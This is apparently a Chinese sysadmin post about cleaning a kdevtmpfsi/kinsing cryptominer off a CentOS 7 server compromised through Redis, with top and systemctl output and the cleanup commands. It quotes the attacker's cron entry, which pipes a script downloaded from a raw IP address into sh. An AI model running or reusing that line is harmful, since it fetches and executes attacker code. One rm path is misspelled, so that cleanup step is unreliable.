系統:centos 7
今天突然收到了服務器的報警信息,登錄服務器通過top檢查發現一個不認識的進程佔用了大量的CPU
[root@VM_5_22_centos cron]# top
top - 11:10:29 up 139 days, 2:54, 1 user, load average: 2.23, 2.19, 2.23
Tasks: 198 total, 1 running, 197 sleeping, 0 stopped, 0 zombie
%Cpu(s):100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 3880224 total, 138612 free, 2735260 used, 1006352 buff/cache
KiB Swap: 1048572 total, 899580 free, 148992 used. 903404 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
10237 redis 20 0 2721444 2.3g 980 S 193.8 61.8 11:35.54 kdevtmpfsi
起初的操作就是直接kill掉,但是kill掉後進程又自動啓動,能自動啓動應該有一個啓動腳本在處理,先處理進程問題
[root@VM_5_22_centos cron]# systemctl status 10237
● session-351642.scope - Session 351642 of user redis
Loaded: loaded (/run/systemd/system/session-351642.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-351642.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since Fri 2020-11-13 09:24:02 CST; 2 weeks 4 days ago
CGroup: /user.slice/user-1002.slice/session-351642.scope
├─ 5906 /var/tmp/kinsing
└─10237 /tmp/kdevtmpfsi
通過systemct找出這個進程相關信息,直接kill掉5906 10237,同時刪除文件
kill -9 5906
kill -9 10237
rm /var/tmp/kinsing -rf
rm /tmp/kedevtmpfsi -rf
這個進程的啓動是通過redis,那麼需要檢查redis用的cron,直接查看/var/spool/cron 目錄下的文件
[root@VM_5_22_centos cron]# cat redis
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
清空redis文件,完成異常處理